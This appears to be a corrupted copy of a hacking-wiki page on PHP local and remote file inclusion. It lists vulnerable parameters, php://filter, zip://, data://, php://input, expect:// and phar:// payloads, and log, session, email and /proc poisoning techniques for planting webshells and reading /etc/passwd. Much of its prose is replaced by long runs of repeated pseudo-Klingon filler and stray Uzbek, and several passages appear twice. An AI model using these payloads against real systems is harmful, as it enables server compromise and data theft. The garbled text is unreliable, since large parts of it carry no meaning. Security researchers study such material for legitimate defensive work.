**'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** *
```python
os.path.join(os.getcwd(), "public", "/etc/passwd")
'/etc/passwd'
```
It is the intended behaviour according to [the docs](https://docs.python.org/3.10/library/os.path.html#os.path.join):

> If a component is an absolute path, all previous components are thrown away and joining continues from the absolute path component.

## Java List Directories

It looks like if you have a Path Traversal in Java and you **ask for a directory** instead of a file, a **listing of the directory is returned**. This won't be happening in other languages (afaik).

## Top 25 parameters

Here’s list of top 25 parameters that could be vulnerable to local file inclusion (LFI) vulnerabilities (from [link](https://twitter.com/trbughunters/status/1279768631845494787)):
```
?cat={payload}
?dir={payload}
?action={payload}
?board={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?prefix={payload}
?include={payload}
?page={payload}
?inc={payload}
?locate={payload}
?show={payload}
?doc={payload}
?site={payload}
?type={payload}
?view={payload}
?content={payload}
?document={payload}
?layout={payload}
?mod={payload}
?conf={payload}
```
## LFI / RFI using PHP wrappers & protocols

### php://filter

PHP filters allow perform basic **modification operations on the data** before being it's read or written. There are 5 categories of filters:

* [String Filters](https://www.php.net/manual/en/filters.string.php):
* `string.rot13`
* `string.toupper`
* `string.tolower`
* `string.strip_tags`: Remove tags from the data (everything between "<" and ">" chars)
* Note that this filter has disappear from the modern versions of PHP
* [Conversion Filters](https://www.php.net/manual/en/filters.convert.php)
* `convert.base64-encode`
* `convert.base64-decode`
* `convert.quoted-printable-encode`
* `convert.quoted-printable-decode`
* `convert.iconv.*` : Transforms to a different encoding(`convert.iconv.<input_enc>.<output_enc>`) . To get the **list of all the encodings** supported run in the console: `iconv -l`

{% hint style="warning" %}
Abusing the `convert.iconv.*` conversion filter you can **generate arbitrary text**, which could be useful to write arbitrary text or make a function like include process arbitrary text. For more info check [**LFI2RCE via php filters**](lfi2rce-via-php-filters.md).
{% endhint %}

* [Compression Filters](https://www.php.net/manual/en/filters.compression.php)
* `zlib.deflate`: Compress the content (useful if exfiltrating a lot of info)
* `zlib.inflate`: Decompress the data
* [Encryption Filters](https://www.php.net/manual/en/filters.encryption.php)
* `mcrypt.*` : Deprecated
* `mdecrypt.*` : Deprecated
* Other Filters
* Running in php `var_dump(stream_get_filters());` you can find a couple of **unexpected filters**:
* `consumed`
* `dechunk`: reverses HTTP chunked encoding
* `convert.*`
```php
# String Filters
## Chain string.toupper, string.rot13 and string.tolower reading /etc/passwd
echo file_get_contents("php://filter/read=string.toupper|string.rot13|string.tolower/resource=file:///etc/passwd");
## Same chain without the "|" char
echo file_get_contents("php://filter/string.toupper/string.rot13/string.tolower/resource=file:///etc/passwd");
## string.string_tags example
echo file_get_contents("php://filter/string.strip_tags/resource=data://text/plain,<b>Bold</b><?php php code; ?>lalalala");

# Conversion filter
## B64 decode
echo file_get_contents("php://filter/convert.base64-decode/resource=data://plain/text,aGVsbG8=");
## Chain B64 encode and decode
echo file_get_contents("php://filter/convert.base64-encode|convert.base64-decode/resource=file:///etc/passwd");
## convert.quoted-printable-encode example
echo file_get_contents("php://filter/convert.quoted-printable-encode/resource=data://plain/text,£hellooo=");
=C2=A3hellooo=3D
## convert.iconv.utf-8.utf-16le
echo file_get_contents("php://filter/convert.iconv.utf-8.utf-16le/resource=data://plain/text,trololohellooo=");

# Compresion Filter
## Compress + B64
echo file_get_contents("php://filter/zlib.deflate/convert.base64-encode/resource=file:///etc/passwd");
readfile('php://filter/zlib.inflate/resource=test.deflated'); #To decompress the data locally
# note that PHP protocol is case-inselective (that's mean you can use "PhP://" and any other varient)
```
{% hint style="warning" %}
"php://filter" qo'lu katta kichik harflardan iborat bo'lib, harf katta kichiklikdan tashqari qabul qilinadi.
{% endhint %}

### php://fd

Ushbu qo'llaydigan fayl deskrptorlarga kirish imkonini beradi. Ochilgan fayllarning tarkibini eksfiltratsiya qilish uchun potentsial ravishda foydali bo'lishi mumkin:
```php
echo file_get_contents("php://fd/3");
$myfile = fopen("/etc/passwd", "r");
```
**php://stdin, php://stdout** jev **php://stderr** vItlhutlh **file descriptors 0, 1, je 2** **ghaH** (ghaH 'attack' vItlhutlh) **ghaH**.

### zip:// je rar://

Zip je Rar file **PHPShell** vItlhutlh je **access**.\
rar protocol **ghaH specifically activated** **ghaH**.
```bash
echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
zip payload.zip payload.php;
mv payload.zip shell.jpg;
rm payload.php

http://example.com/index.php?page=zip://shell.jpg%23payload.php

# To compress with rar
rar a payload.rar payload.php;
mv payload.rar shell.jpg;
rm payload.php
http://example.com/index.php?page=rar://shell.jpg%23payload.php
```
### data://

#### Description

The `data://` protocol allows you to include data directly into a web page or script. It is commonly used to embed images, audio files, or other types of data within HTML documents.

#### Vulnerability

When a web application uses user-supplied input to construct a file path without proper validation or sanitization, it can lead to a file inclusion vulnerability. An attacker can manipulate the input to include arbitrary files from the server's filesystem, including sensitive files containing passwords, configuration files, or even source code.

#### Exploitation

To exploit a file inclusion vulnerability using the `data://` protocol, an attacker can craft a malicious payload that includes the desired file. The payload can be injected into a vulnerable parameter, such as a URL query parameter or a file path.

For example, if the vulnerable application constructs a file path like this:

```
$file = $_GET['file'];
$path = "/var/www/html/files/" . $file;
```

An attacker can manipulate the `file` parameter to include arbitrary files:

```
http://example.com/page.php?file=data://text/plain;base64,SGVsbG8gV29ybGQhCg==
```

In this example, the attacker includes the contents of a text file encoded in base64. The `data://` protocol allows the attacker to specify the MIME type and encoding of the data being included.

#### Prevention

To prevent file inclusion vulnerabilities, it is important to validate and sanitize all user-supplied input used to construct file paths. Avoid using user input directly in file paths and instead use a whitelist approach to only allow specific files or directories to be included.

Additionally, consider implementing access controls to restrict the files that can be included and ensure that sensitive files are not accessible through the web server.

#### References

- [OWASP File Inclusion Vulnerability](https://owasp.org/www-community/attacks/File_Inclusion)
- [PHP Manual - Data Stream Wrappers](https://www.php.net/manual/en/wrappers.data.php)
```
http://example.net/?page=data://text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
http://example.net/?page=data://text/plain,<?php phpinfo(); ?>
http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
http://example.net/?page=data:text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
http://example.net/?page=data:text/plain,<?php phpinfo(); ?>
http://example.net/?page=data:text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"
```
**ghItlhvam** 'allow_url_open' **'ej** 'allow_url_include' **php configurations** **'e'** **tlhIngan** **'e'** **qay'be'** **'e'** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'eS** **'e
```
http://example.com/index.php?page=expect://id
http://example.com/index.php?page=expect://ls
```
### input://

QaD jImejnISmoHmeH POST parameters vItlhutlh.
```bash
curl -XPOST "http://example.com/index.php?page=php://input" --data "<?php system('id'); ?>"
```
### phar://

A `.phar` file can be utilized to execute PHP code when a web application leverages functions such as `include` for file loading. The PHP code snippet provided below demonstrates the creation of a `.phar` file:

### phar://

`.phar` file vItlhutlhlaHbe'chugh web application 'e' vItlhutlhlaHbe'chugh `include` vItlhutlhlaHbe'chugh file loading vaj 'e' vItlhutlhlaHbe'chugh PHP code 'e' vItlhutlhlaHbe'chugh. 'e' vItlhutlhlaHbe'chugh `.phar` file creation vaj 'e' vItlhutlhlaHbe'chugh PHP code snippet vItlhutlhlaHbe'chugh:
```php
<?php
$phar = new Phar('test.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'text');
$phar->setStub('<?php __HALT_COMPILER(); system("ls"); ?>');
$phar->stopBuffering();
```
To compile the `.phar` file, the following command should be executed:

```
phar jcvf <output_file>.phar <input_file>
```

This command will create a compressed `.phar` file from the specified `<input_file>`, and save it as `<output_file>.phar`.
```bash
php --define phar.readonly=0 create_path.php
```
Upon execution, a file named `test.phar` will be created, which could potentially be leveraged to exploit Local File Inclusion (LFI) vulnerabilities.

In cases where the LFI only performs file reading without executing the PHP code within, through functions such as `file_get_contents()`, `fopen()`, `file()`, `file_exists()`, `md5_file()`, `filemtime()`, or `filesize()`, exploitation of a deserialization vulnerability could be attempted. This vulnerability is associated with the reading of files using the `phar` protocol.

For a detailed understanding of exploiting deserialization vulnerabilities in the context of `.phar` files, refer to the document linked below:

[Phar Deserialization Exploitation Guide](phar-deserialization.md)

{% content-ref url="phar-deserialization.md" %}
[phar-deserialization.md](phar-deserialization.md)
{% endcontent-ref %}

### More protocols

Check more possible[ **protocols to include here**](https://www.php.net/manual/en/wrappers.php)**:**

* [php://memory and php://temp](https://www.php.net/manual/en/wrappers.php.php#wrappers.php.memory) — Write in memory or in a temporary file (not sure how this can be useful in a file inclusion attack)
* [file://](https://www.php.net/manual/en/wrappers.file.php) — Accessing local filesystem
* [http://](https://www.php.net/manual/en/wrappers.http.php) — Accessing HTTP(s) URLs
* [ftp://](https://www.php.net/manual/en/wrappers.ftp.php) — Accessing FTP(s) URLs
* [zlib://](https://www.php.net/manual/en/wrappers.compression.php) — Compression Streams
* [glob://](https://www.php.net/manual/en/wrappers.glob.php) — Find pathnames matching pattern (It doesn't return nothing printable, so not really useful here)
* [ssh2://](https://www.php.net/manual/en/wrappers.ssh2.php) — Secure Shell 2
* [ogg://](https://www.php.net/manual/en/wrappers.audio.php) — Audio streams (Not useful to read arbitrary files)

## LFI via PHP's 'assert'

Local File Inclusion (LFI) risks in PHP are notably high when dealing with the 'assert' function, which can execute code within strings. This is particularly problematic if input containing directory traversal characters like ".." is being checked but not properly sanitized.

For example, PHP code might be designed to prevent directory traversal like so:
```bash
assert("strpos('$file', '..') === false") or die("");
```
**DaH jImej** *'ej* **qoH** *'e'**.** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *'e'* **'ej** **'Iv** *
```plaintext
' and die(highlight_file('/etc/passwd')) or '
```
DaH jatlh 'ej vItlhutlh. 'ej, 'ej vItlhutlh.
```plaintext
' and die(system("id")) or '
```
**URL-encode these payloads**.

<figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>

Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!

**Hacking Insights**\
Engage with content that delves into the thrill and challenges of hacking

**Real-Time Hack News**\
Keep up-to-date with fast-paced hacking world through real-time news and insights

**Latest Announcements**\
Stay informed with the newest bug bounties launching and crucial platform updates

**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!

## PHP Blind Path Traversal

{% hint style="warning" %}
This technique is relevant in cases where you **control** the **file path** of a **PHP function** that will **access a file** but you won't see the content of the file (like a simple call to **`file()`**) but the content is not shown.
{% endhint %}

In [**this incredible post**](https://www.synacktiv.com/en/publications/php-filter-chains-file-read-from-error-based-oracle.html) it's explained how a blind path traversal can be abused via PHP filter to **exfiltrate the content of a file via an error oracle**.

As sumary, the technique is using the **"UCS-4LE" encoding** to make the content of a file so **big** that the **PHP function opening** the file will trigger an **error**.

Then, in order to leak the first char the filter **`dechunk`** is used along with other such as **base64** or **rot13** and finally the filters **convert.iconv.UCS-4.UCS-4LE** and **convert.iconv.UTF16.UTF-16BE** are used to **place other chars at the beggining and leak them**.

**Functions that might be vulnerable**: `file_get_contents`, `readfile`, `finfo->file`, `getimagesize`, `md5_file`, `sha1_file`, `hash_file`, `file`, `parse_ini_file`, `copy`, `file_put_contents (only target read only with this)`, `stream_get_contents`, `fgets`, `fread`, `fgetc`, `fgetcsv`, `fpassthru`, `fputs`

For the technical details check the mentioned post!

## LFI2RCE

### Remote File Inclusion

Explained previously, [**follow this link**](./#remote-file-inclusion).

### Via Apache/Nginx log file

If the Apache or Nginx server is **vulnerable to LFI** inside the include function you could try to access to **`/var/log/apache2/access.log` or `/var/log/nginx/access.log`**, set inside the **user agent** or inside a **GET parameter** a php shell like **`<?php system($_GET['c']); ?>`** and include that file

{% hint style="warning" %}
Note that **if you use double quotes** for the shell instead of **simple quotes**, the double quotes will be modified for the string "_**quote;**_", **PHP will throw an error** there and **nothing else will be executed**.

Also, make sure you **write correctly the payload** or PHP will error every time it tries to load the log file and you won't have a second opportunity.
{% endhint %}

This could also be done in other logs but **be careful,** the code inside the logs could be URL encoded and this could destroy the Shell. The header **authorisation "basic"** contains "user:password" in Base64 and it is decoded inside the logs. The PHPShell could be inserted inside this header.\
Other possible log paths:
```python
/var/log/apache2/access.log
/var/log/apache/access.log
/var/log/apache2/error.log
/var/log/apache/error.log
/usr/local/apache/log/error_log
/usr/local/apache2/log/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/httpd/error_log
```
Fuzzing wordlist: [https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI)

### Via Email

**Send a mail** to a internal account (user@localhost) containing your PHP payload like `<?php echo system($_REQUEST["cmd"]); ?>` and try to include to the mail of the user with a path like **`/var/mail/<USERNAME>`** or **`/var/spool/mail/<USERNAME>`**

### Via /proc/\*/fd/\*

1. Upload a lot of shells (for example : 100)
2. Include [http://example.com/index.php?page=/proc/$PID/fd/$FD](http://example.com/index.php?page=/proc/$PID/fd/$FD), with $PID = PID of the process (can be brute forced) and $FD the file descriptor (can be brute forced too)

### Via /proc/self/environ

Like a log file, send the payload in the User-Agent, it will be reflected inside the /proc/self/environ file
```
GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
User-Agent: <?=phpinfo(); ?>
```
### Qa'Hom

vaj vay' upload vItlhutlh. vaj inject shell payload vItlhutlh (e.g : `<?php system($_GET['c']); ?>` ).
```
http://example.com/index.php?page=path/to/uploaded/file.png
```
**ghItlhvam**: 
DaH jImej, vaj 'e' vItlhutlh. 'e' vItlhutlh 'e' vItlhutlh. 

### Zip fie upload qar

PHP shell compressed 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh. 'e' vItlhutlh 'e' vItlhutlh.
```python
example.com/page.php?file=zip://path/to/zip/hello.zip%23rce.php
```
### PHP sessions jatlh

Qap website vItlhutlh PHP Session (PHPSESSID) lo'laH.
```
Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly
```
In PHP these sessions are stored into _/var/lib/php5/sess\\_\[PHPSESSID]\_ files

---

**Klingon Translation:**

In PHP vItlhutlh _/var/lib/php5/sess\\_\[PHPSESSID]\_ files DaH jImej.
```
/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27.
user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";
```
Set the cookie to `<?php system('cat /etc/passwd');?>`

Klingon Translation:

Set the cookie to `<?php system('cat /etc/passwd');?>`
```
login=1&user=<?php system("cat /etc/passwd");?>&pass=password&lang=en_us.php
```
### LFI (Local File Inclusion)

#### Description

LFI (Local File Inclusion) is a vulnerability that allows an attacker to include files from the target system. This can be exploited to read sensitive files, execute arbitrary code, or even gain remote code execution.

#### PHP Session File Inclusion

One common use case of LFI is to include the PHP session file. PHP session files store user session data, including sensitive information such as authentication tokens and user preferences. By exploiting LFI, an attacker can gain access to these session files and potentially hijack user sessions.

To include the PHP session file, the attacker needs to know the path to the session file on the target system. This can often be found by analyzing the application's source code or by using directory traversal techniques.

Once the path to the session file is known, the attacker can craft a request to include the file using the LFI vulnerability. The file will then be parsed by the PHP interpreter, allowing the attacker to access the session data contained within.

#### Example

Assuming the PHP session file is located at `/var/www/sessions/sess_1234567890abcdef`, the attacker can include it using the following LFI payload:

```
http://example.com/vulnerable.php?page=/var/www/sessions/sess_1234567890abcdef
```

This will cause the vulnerable PHP script to include the session file, making its contents accessible to the attacker.

#### Mitigation

To prevent PHP session file inclusion vulnerabilities, it is recommended to:

- Avoid using user-supplied input directly in file inclusion functions.
- Implement proper input validation and sanitization.
- Use whitelisting to restrict the allowed file paths.
- Store session files in a secure location with restricted access permissions.

By following these best practices, you can significantly reduce the risk of LFI vulnerabilities and protect sensitive session data.
```
login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm2
```
### **Via** ssh

**ssh** **jatlh** **check** **qaStaHvIS** **user** **(/proc/self/status & /etc/passwd)** **'ej** **try** **access** **\<HOME>/.ssh/id\_rsa**

### **Via** **vsftpd** _**logs**_

**FTP** **server** **vsftpd** **logs** **_/var/log/vsftpd.log_** **yIqaw**. **Local File Inclusion (LFI)** **vulnerability** **pagh** **'e'** **vsftpd** **server** **access** **possible**, **steps** **vay** **consider**:

1. **PHP** **payload** **inject** **username** **field** **login** **process**.
2. **Injection** **jatlh** **LFI** **retrieve** **server** **logs** **_/var/log/vsftpd.log_**.

### **Via** **php base64 filter (using base64)**

